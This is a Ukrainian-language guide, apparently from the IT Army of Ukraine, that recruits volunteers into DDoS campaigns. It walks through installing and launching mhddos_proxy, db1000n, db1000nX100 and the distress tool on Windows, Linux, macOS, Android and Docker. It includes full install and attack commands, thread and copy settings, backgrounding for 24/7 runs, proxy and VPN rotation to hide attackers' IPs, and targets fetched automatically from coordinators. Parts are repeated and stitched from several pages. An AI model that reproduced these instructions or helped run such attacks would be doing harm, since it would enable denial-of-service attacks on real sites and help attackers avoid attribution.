
Кожне рішення має свої переваги, тому ми не можемо радити встановити вас якесь конкретне програмне забезпечення. Вам потрібно обрати будь-яке під вашу операційну систему, запустити і можливо спробувати інше і обрати більш комфортне і ефективне саме для вас і вашого заліза.
Тільки можемо порадати краще розгортати атаку на віртульній, хмарній машині (VPS). Так ефективніше і ви не будете при цьому навантажувати свою власну мережу, а також можливо розгорнути безліч віртуальних машин і тим саме збільшити свої потужності.
Візуалізація покрокового встановлення та запуску
Запускаємо ярлик на Робочому столі, приєднуємося до ItArmy of Ukraine у бородьбі за Україну!
Стосовно атаки з VPN є деякі тонкощі:
Як зрозуміти як краще у Вашому випадку - з або без VPN?
Якщо без VPN у вас більше 15 хвилин стабільно працює Інтернет і скрипт (генерує більше 15 Мбіт/с трафіку в полі "Усього") - вам міняти нічого не потрібно
Якщо без VPN у вас починають тормозити / не відкриватися сайти / пропадає інтернет та/або трафік в скрипті (поле "Усього") менше 5 Мбіт/с - вам варто підключити VPN CyberGhost та перевірити чи буде краще (теж саме поле "Усього")
Переходимо до каталогу раніше встановленого ukita_installer та відкриваємо для редагування файл runner.bat
Шукаємо строки 35-45 та у разі потреби додаємо необхідні аргументи атаки
python runner.py --lang UA --itarmy --vpn
Детальніше про всі можливі аргументи цікавимось за ЦИМ посиланням.
При першому запуску команди відбудеться скачування та встановлення скриптів, потім скрипт почне отримувати проксі-сервера для атак ну і почне свою роботу. За замовченням скрипт самостійно буде оновлювати проксі кожні 10 хвилин, тому нас не зупинити!
УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей, актуальний список параметрів можна переглянути тут.
Змінити навантаження: -t XXX - кількість потоків на кожне ядро CPU, за замовчуванням - 1000 одноядерного процессора, у разі двох і більше ядер - 8000
Посилання: https://t.me/itarmyofukraine2022
Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнутся. docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy --lang UA --itarmy
sudo apt update -y
sudo apt install --upgrade git screen python3 python3-pip python3-dev rustc -y
python3 -m pip install --upgrade pip
Далі клононуємо та підготовлюємо до запуску актуальний код mhddos_proxy:
cd ~
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy
cd ~/mhddos_proxy
python3 -m pip install -r requirements.txt
Далі переходимо безпосередньо до атак
Для атак я рекомендую використовувати скрипти mhddos_proxy, у цього способу є декілька переваг, а саме:ВИМКНІТЬ VPN - використовуються проксі, VPN тільки заважатиме!
УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей, актуальний список параметрів можна переглянути тут.
Змінити навантаження: -t XXX - кількість потоків на кожне ядро CPU, за замовчуванням - 1000 для одноядерного процессора, у разі двох і більше ядер - 7500
Посилання: https://t.me/itarmyofukraine2022
Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнутся.
Команда запуску атаки:
screen -S "mhddos_proxy" python3 runner.py --itarmy
Натискаємо Ctrl+A , потім Ctrl+D - ГОТОВО - Атака працює у фоні.Щоб подивитися які процеси працюють у фоні введіть:
(команда виведе список процесів)
screen -ls
Щоб перейти до процесу та дізнатися як у нього справи (що він виводить), пишіть:
screen -r mhddos_proxy
Щоб знову від'єднатися, та залишити його працювати:
Натискаємо Ctrl+A , потім Ctrl+D - ГОТОВО - Атака працює у фоні.
Таким чином воно буде працювати 24/7 навіть при вимкненому ПК!
Якщо хочете закрити (ВБИТИ) процес - натискайте Ctrl+C
sudo apt update
sudo apt install -y docker.io
sudo systemctl enable docker --now
docker
sudo usermod -aG docker $USER
Нижче це одна команда
printf '%s\n' "deb https://download.docker.com/linux/debian bullseye stable" | sudo tee /etc/apt/sources.list.d/docker-ce.list ; curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/trusted.gpg.d/docker-ce-archive-keyring.gpg
Продовжуємо. Один рядок - одна команда:
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io screen
sudo systemctl unmask docker.service
sudo systemctl unmask docker.socket
sudo systemctl start docker.service
sudo chmod 666 /var/run/docker.sock
sudo docker run hello-world
Далі переходимо безпосередньо до атак
Для атак рекомендуємо використовувати mhddos_proxy, у цього способу є декілька переваг, а саме:Стосовно атаки з VPN є деякі тонкощі:
Як зрозуміти як краще у Вашому випадку - з або без VPN?
Якщо без VPN у вас більше 15 хвилин стабільно працює Інтернет і скрипт (генерує більше 25 Мбіт/с трафіку в полі "Усього") - вам міняти нічого не потрібно
Якщо без VPN у вас починають тормозити / не відкриватися сайти / пропадає інтернет та/або трафік в скрипті (поле "Усього") менше 15 Мбіт/с - вам варто підключити VPN CyberGhost та перевірити чи буде краще (теж саме поле "Усього")
УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей. Актуальний список параметрів можна переглянути тут.
При наявності у Вас 4+ CPU та мережі 100+ Mb/s є можливість запуску декількох копій. Для цого додайте правпорець --copies 2
Посилання: https://t.me/itarmyofukraine2022
Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнуться.
Для Docker:
screen -S "mhddos_proxy_docker" docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy --itarmy --lang UA
Натискаємо Ctrl+A , потім Ctrl+D - ГОТОВО - Атака працює у фоні.Щоб подивитися які процеси працюють у фоні введіть:
(команда виведе список процесів)
screen -ls
Щоб перейти до процесу та дізнатися як у нього справи (що він виводить), пишіть:
screen -r mhddos_proxy_docker
Щоб знову від'єднатися, та залишити його працювати:
Натискаємо Ctrl+A , потім Ctrl+D - ГОТОВО - Атака працює у фоні.
Таким чином воно буде працювати 24/7 навіть при вимкненому ПК!
Якщо хочете закрити (ВБИТИ) процес - натискайте Ctrl+C
Заходимо в термінал та вводимо наступну команду:
python3
Якщо Python вже встановлено, то Ви побачите текст у терміналі подібний до цього:
Якщо встановлена версія python3 не менша за 3.10.0, закриваємо вікно терміналу та переходимо до пункту 2.
Якщо у Вас не встановлений Python, або його версія нижча за 3.10.0, переходимо до опису "Встановлення Python 3.10.5".
Якщо у вас не вийшло встановити GIT, переходимо до опису "Встановлення GIT через Термінал".
Встановлення GIT через Термінал
Відкриваємо Terminal або будь-який ваш улюбленний емулятор терміналу та встановлюємо пакетний менеджер Brew наступною командою:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
Готуємо Brew до використання наступними командами, окремо кожну що з нового рядка:
echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile
eval "$(/opt/homebrew/bin/brew shellenv)"
Далі, встановлюємо GIT наступною командою:
brew install git
Відкриваємо Terminal та вводимо наступні команди, окремо кожну що з нового рядка:
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
python3 -m pip install --upgrade pip
python3 -m pip install -r requirements.txt
Якщо залежності успішно встановляться то Ви побачите текст у терміналі подібний до цього:
Все добре, mhddos_proxy підготовлений, переходимо до пункту 4.
Далі переходимо безпосередньо до атак
Для атак рекомендуємо використовувати mhddos_proxy, у цього способу є декілька переваг, а саме:Стосовно атаки з VPN є деякі тонкощі:
Як зрозуміти як краще у Вашому випадку - з або без VPN?
Якщо без VPN у вас більше 15 хвилин стабільно працює Інтернет і скрипт (генерує більше 25 Мбіт/с трафіку в полі "Усього") - вам міняти нічого не потрібно
Якщо без VPN у вас починають тормозити / не відкриватися сайти / пропадає інтернет та/або трафік в скрипті (поле "Усього") менше 15 Мбіт/с - вам варто підключити VPN CyberGhost та перевірити чи буде краще (теж саме поле "Усього")
*перевіряти треба з параметрами за замовчуванням:
./runner.sh python3 --itarmy
за потреби python3
замінити на той, який ви зазвичай використовуєте:
python
або python3.10
або інший (без інших додаткових параметрів)
УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей. Актуальний список параметрів можна переглянути тут.
При наявності у Вас 4+ CPU та мережі 100+ Mb/s є можливість запуску декількох копій. Для цого додайте правпорець --copies 2
Посилання: https://t.me/itarmyofukraine2022
Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнуться.
Відкриваємо Terminal в раніше підготовленій папці mhddos_proxy та виконуємо команду запуску атаки:
./runner.sh python3 --itarmy
Якщо приберете вікно терміналу у трей (не закриваючи його), скрипт буде продовжувати працювати.
Якщо хочете залишити на тривалий час (наприклад, на ніч), то змініть налаштування так щоб Mac не засинав коли він не використовується.
apt update && apt upgrade -y
pkg install python -y && pkg install rust -y && pkg install git -y
pip install --upgrade pip
cd ~
Далі специфічно в залежності від архітектури процесора. Але виставлено по пріоритету, якщо Ви не знаєте яка у вас архітектура то спробуйте встановлювати цю зміну перебираючи цей пріоритет до поки запуск атаки не буде успішним.
Отже, наступна команда повинна мати чітко визначену архітектуру процесора та приведена до наступного виду:
(якщо обрана не вірна архітектура то при запуску атаки буде помилка)
export CARGO_BUILD_TARGET=(тут ваша архітектура, що була обрана вище ↑)
termux-setup-storage(натискаємо: "Разрешить")
pkg install git -y
cd ~/storage/shared
rm -rf mhddos_proxyНе звертайте увагу на можливу помилку rm: cannot remove 'mhddos_proxy': No such file or directory, продовжуйте вводити команди.
git config --global --add safe.directory /storage/emulated/0/mhddos_proxy
(ця команда нічого не виводить)
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
pip install -r termux_requirements.txt
Відкрити Termux через іконку на головному екрані та вводимо наступні команди:
Заходимо в папку mhddos_proxy: cd ~/storage/shared/mhddos_proxy
Далі переходимо безпосередньо до атак
УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати до і після переліку цілей, актуальний список параметрів можна переглянути тут.
Для Android параметр -t не повинно перевищувати 1500, а --rpc не більше 1000
Посилання: https://t.me/itarmyofukraine2022
Ми автоматизували підтягування цілей. Просто запустіть одну команду і цілі автоматом підтягнутся.
TERMUX=1 bash runner.sh python --itarmy -t 1500
Якщо у вас є стабільший швидкий VPN, можна так:
TERMUX=1 bash runner.sh python --itarmy -t 1500 --vpn
Приклад успішно запущеної атаки:
Щоб зупинити скрипт(атаку) треба одночасно натиснути Ctrl та C (англійську)
Надалі після успішного встановлення вам потрібно буде робити лише наступні дії:
cd ~/storage/shared/mhddos_proxy
TERMUX=1 bash runner.sh python --itarmy -t 1500
Якщо у вас є стабільший швидкий VPN, можна так:
TERMUX=1 bash runner.sh python --itarmy -t 1500 --vpn
Завантажте останню версію програми для вашої платформи:
Завантажте останню версію для своєї arch/OS. Розпакуйте архів і запустіть його.
Якщо в вас є встановлений Docker, запустіть:
docker run --rm -it --pull always ghcr.io/arriven/db1000n
Або, якщо ваш контейнер не може підключитися до локальної VPN:
docker run --rm -it --pull always --network host ghcr.io/arriven/db1000n
db1000nX100 – продукт на основі популярної української програми для проведення DDoS-атак по росії db1000n, який значно підвищує ефективність атаки (до 100 разів і навіть більше, звідси й X100 у назві)
db1000nX100 автоматично встановлює багато паралельних VPN-з’єднань, на кожному із яких працює окрема програма db1000n. Раз у 15 хвилин відбувається зміна IP-адрес за рахунок перепідключення до інших VPN-серверів. Це забезпечує постійну зміну IP-адрес, з яких ведеться атака.
Оскільки програма db1000nX100 є контейнером, вона працює на всіх операційних системах:
Доступні образи для завантаження для наступних програм:
Більше інформації про цей метод шукайте тут - Сайт db1000nX100Долучитись може будь-хто в кого є доступ до компʼютера — це 1 хв відео з ілюстрацією роботи програми 👇
Все що потрібно лише завантажити, запустити додаток. Технічі нюанси, координацію і відбір сайтів для атаки бере на себе координатори IT Army of Ukraine.
Програму не потрібно ніяк підтримувати, просто відкрийте хоч на цілий день і займайтеся своїми справами. Залишіть стандартні налаштування. Запускати ефективніше лише одне вікно програми, не потрібно відкривати паралельно кілька.
Панове, запрошуємо до тестування нової ддос тули
https://github.com/Yneth/distress-releases/releasesвона використовує проксі, так що за свій айпі можна не боятись.
Цілі автоматично підтягуються з itarmy.
На тестовій машині забирає весь трафік - 400мбіт.
wget https://github.com/Yneth/distress-releases/releases/latest/download/distress_x86_64-apple-darwin
chmod +x distress_x86_64-apple-darwin
./distress_x86_64-apple-darwin -c 2048
wget https://github.com/Yneth/distress-releases/releases/latest/download/distress_x86_64-unknown-linux-musl
chmod +x distress_x86_64-unknown-linux-musl
./distress_x86_64-unknown-linux-musl -c 2048
Якщо запускати під впн, то потужностей з проксі не буде. Для цього використовуйте прапорець
—use-my-ip 100
docker run --rm -it --pull always ghcr.io/yneth/distress
Не забудьте використовувати VPN!
Атака за допомогою 50 iframes для автоматичного оновлення кожної адреси URL щосекунди!
(щоб збільшити потужність атаки потрібно задіяти спливаючі вікна!)
Разом до перемоги!